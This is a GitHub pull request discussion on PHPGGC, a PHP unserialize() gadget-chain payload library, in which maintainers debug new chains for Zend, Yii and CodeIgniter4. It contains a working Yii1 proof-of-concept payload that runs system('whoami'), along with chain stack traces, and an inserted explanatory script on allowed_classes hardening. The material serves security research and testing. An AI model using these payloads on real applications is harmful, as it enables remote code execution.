ambionics / phpggc

PHPGGC is a library of PHP unserialize() payloads along with a tool to generate them, from command line or programmatically.
https://ambionics.io/blog
Apache License 2.0

add some gadget chains that I had collected #160

Open CyanM0un opened 1 year ago

CyanM0un commented 1 year ago

Hi, I sorted out a few gadget chains of some frameworks. I have manually checked all of them, and some of them have passed the test-gc-compatibility script, for which I have modified the corresponding version range in chain.php. It seems like no small work for both of us :)

cfreal commented 1 year ago

Hello CyanM0un,

That's amazing work! I'll try and integrate it in the upcoming weeks; as you have said, it is a lot of work :)

Charles

cfreal commented 11 months ago

Hello,

Still haven't had time to check this amazing work. Will do in the upcoming weeks!

cfreal commented 6 months ago

Hello,

I have started working on your GCs, CyanM0un. Every ZendFramework payload works except for FI1:

$ php7.1 /tools/web/php/phpggc/phpggc ZendFramework/FI1 --test-payload
Trying to deserialize payload...
PHP Warning:  Exception caught by form: Plugin by name '/tmp/phpggc110c813231d70d6d47e543bc48d27d69254966a5' was not found in the registry; used paths:
: 
Stack Trace:
#0 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Form.php(2709): Zend_Loader_PluginLoader->load('/tmp/phpggc110c...')
#1 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Form.php(3458): Zend_Form->_getDecorator('/tmp/phpggc110c...', 'options')
#2 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Form.php(2864): Zend_Form->_loadDecorator(Array, 'k')
#3 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Form.php(2992): Zend_Form->getDecorators()
#4 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Form.php(3010): Zend_Form->render()
#5 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Service/Twitter.php(263): Zend_Form->__toString()
#6 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Ldap/Node.php(195): Zend_Service_Twitter->__call('detachLdap', Array)
#7 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Ldap/Node.php(128) in /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Form.php on line 3015
PHP Fatal error:  Uncaught Zend_Service_Twitter_Exception: Invalid method "detachldap" in /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Service/Twitter.php:266
Stack trace:
#0 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Ldap/Node.php(195): Zend_Service_Twitter->__call('detachLdap', Array)
#1 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Ldap/Node.php(128): Zend_Ldap_Node->detachLdap()
#2 [internal function]: Zend_Ldap_Node->__wakeup()
#3 /tools/web/php/phpggc/lib/test_payload.php(46): unserialize('O:14:"Zend_Ldap...')
#4 {main}
  thrown in /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Service/Twitter.php on line 266
FAILURE: Payload did not trigger !

Any ideas why?

CyanM0un commented 6 months ago

Oh, in the last gadget class (Zend_Loader_PluginLoader), the function load appends a '.php' suffix to the file path, so '/tmp/phpggc110c813231d70d6d47e543bc48d27d69254966a5' may not be found.

CyanM0un commented 6 months ago


Maybe we should specify that the chain only includes arbitrary PHP files.

cfreal commented 6 months ago

Ok, fixed for Zend. Yii2 GCs work as well. Now, Yii/RCE3 tries to use PHPUnit_Extensions_Selenium2TestCase_Session, which is NOT included in the Yii 1.1.20 distribution.

CyanM0un commented 6 months ago

I used the command composer create-project yiisoft/yii=1.1.20 yii1 to create the project for finding GCs. To be honest, I am a little confused about the difference and what the standard way may be. I would kindly request your opinion :)

cfreal commented 6 months ago

Ok, I used the package present in their github repository.

Do you by any chance still have your vendor/composer/installed.json? Now that I use your procedure, I get:

$ composer create-project yiisoft/yii=1.1.20 yii1
... blabla success
$ cd yii1
$ php7.4 /tools/web/php/phpggc/phpggc Yii/RCE3 --test-payload
Trying to deserialize payload...
PHP Fatal error:  Uncaught Error: Call to undefined method DocBlox_Parallel_Worker::curl() in /.../yii1/vendor/phpunit/phpunit-selenium/PHPUnit/Extensions/Selenium2TestCase/Session.php:194
Stack trace:
#0 /.../yii1/vendor/phpunit/phpunit-selenium/PHPUnit/Extensions/Selenium2TestCase/Session.php(173): PHPUnit_Extensions_Selenium2TestCase_Session->stop()
#1 [internal function]: PHPUnit_Extensions_Selenium2TestCase_Session->__destruct()
#2 {main}
  thrown in /.../yii1/vendor/phpunit/phpunit-selenium/PHPUnit/Extensions/Selenium2TestCase/Session.php on line 194
FAILURE: Payload did not trigger !

CyanM0un commented 6 months ago

I don't think that's the problem... I tested it right now using the package and it worked, e.g.:

<?php
include("./vendor/autoload.php");
include("./framework/YiiBase.php");
$poc = "O%3A11%3A%22CDbCriteria%22%3A1%3A%7Bs%3A6%3A%22params%22%3BO%3A12%3A%22CMapIterator%22%3A3%3A%7Bs%3A16%3A%22%00CMapIterator%00_d%22%3BO%3A5%3A%22CForm%22%3A1%3A%7Bs%3A16%3A%22%00CForm%00_elements%22%3BO%3A44%3A%22PHPUnit_Extensions_Selenium2TestCase_Session%22%3A3%3A%7Bs%3A11%3A%22%00%2A%00commands%22%3Ba%3A1%3A%7Bs%3A6%3A%22itemAt%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A6%3A%22%00%2A%00url%22%3BO%3A40%3A%22PHPUnit_Extensions_Selenium2TestCase_URL%22%3A0%3A%7B%7Ds%3A9%3A%22%00%2A%00driver%22%3BO%3A23%3A%22DocBlox_Parallel_Worker%22%3A0%3A%7B%7D%7D%7Ds%3A19%3A%22%00CMapIterator%00_keys%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3B%7Ds%3A18%3A%22%00CMapIterator%00_key%22%3Bs%3A6%3A%22whoami%22%3B%7D%7D";
unserialize(urldecode($poc)); // system('whoami')

The error was triggered in the PHPUnit_Extensions_Selenium2TestCase_Session#__destruct() process; however, the GC's function call should be triggered and finished in the CDbCriteria#__wakeup() process. DocBlox_Parallel_Worker doesn't have the curl function because in gadgets.php I simply picked a class (DocBlox_Parallel_Worker) and assigned it to the driver field of PHPUnit_Extensions_Selenium2TestCase_Session, which should not influence the command execution.
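The ordering argument above (the chain's work finishes inside `__wakeup()` while the later fatal error comes from a `__destruct()` that only runs once the object is freed) is easy to see in isolation. The script below is an added example, not code from phpggc or from this PR; the class name `WakeupGadget` and its payload are constructed. It also shows the defensive side: with `allowed_classes` set, `unserialize()` yields a `__PHP_Incomplete_Class` and neither magic method runs, which is the same mechanism behind the `__PHP_Incomplete_Class` error seen later in this thread when a class is missing.

```php
<?php
// Added example (not from phpggc or this PR): models the __wakeup/__destruct
// lifecycle discussed above. WakeupGadget is a hypothetical stand-in class.

declare(strict_types=1);

class WakeupGadget
{
    public string $note = 'constructed sample';

    // Runs inside unserialize(): a __wakeup-based chain does its work here.
    public function __wakeup(): void
    {
        echo "[wakeup] ran inside unserialize()\n";
    }

    // Runs when the object is freed, i.e. after unserialize() has returned.
    // A fatal error raised here happens only after __wakeup has completed.
    public function __destruct()
    {
        echo "[destruct] ran after unserialize() returned\n";
    }
}

// Constructed sample payload, equivalent to serialize(new WakeupGadget()).
$payload = 'O:12:"WakeupGadget":1:{s:4:"note";s:18:"constructed sample";}';

echo "--- unserialize() of untrusted data ---\n";
$obj = unserialize($payload);
echo "unserialize() returned\n";
unset($obj); // __destruct fires here, after the __wakeup work is done

echo "--- hardened: allowed_classes => false ---\n";
$safe = unserialize($payload, ['allowed_classes' => false]);
var_dump($safe instanceof __PHP_Incomplete_Class); // bool(true)
unset($safe); // nothing fires: an incomplete class has no __wakeup/__destruct

echo "--- hardened: explicit allow-list ---\n";
// Only the listed class names are instantiated; everything else is
// demoted to __PHP_Incomplete_Class, so magic methods never run.
$listed = unserialize($payload, ['allowed_classes' => ['SomeExpectedDto']]);
var_dump(get_class($listed));
```

Run it with `php lifecycle.php` (any PHP 7.4 or later). The first section prints the wakeup line before `unserialize() returned` and the destruct line after it; the two hardened sections print nothing from the class at all, which is why an `allowed_classes` list (or avoiding `unserialize()` on external input entirely) closes the whole gadget-chain class of problems rather than any single chain.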

cfreal commented 6 months ago

Ok, I was missing the YiiBase import :) Making progress!

CyanM0un commented 6 months ago

> Ok, I was missing the YiiBase import :) Making progress!

Indeed a mountain of work. 😂 Much respect to you.

cfreal commented 2 months ago

Hello @CyanM0un!

I am back to process a few more GCs. In CI4, RCE7, you use \Symfony\Component\HttpFoundation\Request, which does not seem to be included in the standard distribution of the framework. I tried:

$ composer create-project codeigniter4/appstarter=4.1.3 hello123

and

$ wget https://github.com/codeigniter4/framework/archive/refs/tags/v4.1.3.zip

Any ideas?

CyanM0un commented 2 months ago

> Hello @CyanM0un!
>
> I am back to process a few more GCs. In CI4, RCE7, you use \Symfony\Component\HttpFoundation\Request, which does not seem to be included in the standard distribution of the framework. I tried:
>
> $ composer create-project codeigniter4/appstarter=4.1.3 hello123
>
> and
>
> $ wget https://github.com/codeigniter4/framework/archive/refs/tags/v4.1.3.zip
>
> Any ideas?

I used the second way; however, after I get the source code I usually run the command composer install to do the initialization, so \Symfony\Component\HttpFoundation\Request will be included.

CyanM0un commented 2 months ago

Finally, thank you very much for your continued contact. I also admire your work on Iconv, set the charset to RCE! (Actually, all these gadget chains I have submitted as pull requests were discovered by our automation tool. I personally think it works very well, and I wonder if you could help promote it when we open-source it hahaha :)

cfreal commented 2 months ago

> Hello @CyanM0un! I am back to process a few more GCs. In CI4, RCE7, you use \Symfony\Component\HttpFoundation\Request, which does not seem to be included in the standard distribution of the framework. I tried:
>
> $ composer create-project codeigniter4/appstarter=4.1.3 hello123
>
> and
>
> $ wget https://github.com/codeigniter4/framework/archive/refs/tags/v4.1.3.zip
>
> Any ideas?

> I used the second way; however, after I get the source code I usually run the command composer install to do the initialization, so \Symfony\Component\HttpFoundation\Request will be included.

This is what I am doing, but still, it does not work:

$ wget https://github.com/codeigniter4/framework/archive/refs/tags/v4.1.3.zip
$ unzip v4.1.3.zip
$ cd framework-4.1.3
$ composer install
$ phpggc CodeIgniter4/RCE7 --test-payload
Trying to deserialize payload...
PHP Fatal error:  Uncaught Error: Object of class __PHP_Incomplete_Class could not be converted to string in /dev/shm/framework-4.1.3/system/Session/Handlers/DatabaseHandler.php:378
Stack trace:
#0 /dev/shm/framework-4.1.3/system/Session/Handlers/DatabaseHandler.php(266): CodeIgniter\Session\Handlers\DatabaseHandler->releaseLock()
#1 /dev/shm/framework-4.1.3/system/Cache/Handlers/RedisHandler.php(70): CodeIgniter\Session\Handlers\DatabaseHandler->close()
#2 [internal function]: CodeIgniter\Cache\Handlers\RedisHandler->__destruct()
#3 {main}
  thrown in /dev/shm/framework-4.1.3/system/Session/Handlers/DatabaseHandler.php on line 378
FAILURE: Payload did not trigger !

CyanM0un commented 2 months ago

> Hello @CyanM0un! I am back to process a few more GCs. In CI4, RCE7, you use \Symfony\Component\HttpFoundation\Request, which does not seem to be included in the standard distribution of the framework. I tried:
>
> $ composer create-project codeigniter4/appstarter=4.1.3 hello123
>
> and
>
> $ wget https://github.com/codeigniter4/framework/archive/refs/tags/v4.1.3.zip
>
> Any ideas?

> I used the second way; however, after I get the source code I usually run the command composer install to do the initialization, so \Symfony\Component\HttpFoundation\Request will be included.

> This is what I am doing, but still, it does not work:
>
> $ wget https://github.com/codeigniter4/framework/archive/refs/tags/v4.1.3.zip
> $ unzip v4.1.3.zip
> $ cd framework-4.1.3
> $ composer install
> $ phpggc CodeIgniter4/RCE7 --test-payload
> Trying to deserialize payload...
> PHP Fatal error:  Uncaught Error: Object of class __PHP_Incomplete_Class could not be converted to string in /dev/shm/framework-4.1.3/system/Session/Handlers/DatabaseHandler.php:378
> Stack trace:
> #0 /dev/shm/framework-4.1.3/system/Session/Handlers/DatabaseHandler.php(266): CodeIgniter\Session\Handlers\DatabaseHandler->releaseLock()
> #1 /dev/shm/framework-4.1.3/system/Cache/Handlers/RedisHandler.php(70): CodeIgniter\Session\Handlers\DatabaseHandler->close()
> #2 [internal function]: CodeIgniter\Cache\Handlers\RedisHandler->__destruct()
> #3 {main}
>   thrown in /dev/shm/framework-4.1.3/system/Session/Handlers/DatabaseHandler.php on line 378
> FAILURE: Payload did not trigger !

Sorry, my URL is https://github.com/codeigniter4/CodeIgniter4/archive/refs/tags/v4.1.3.zip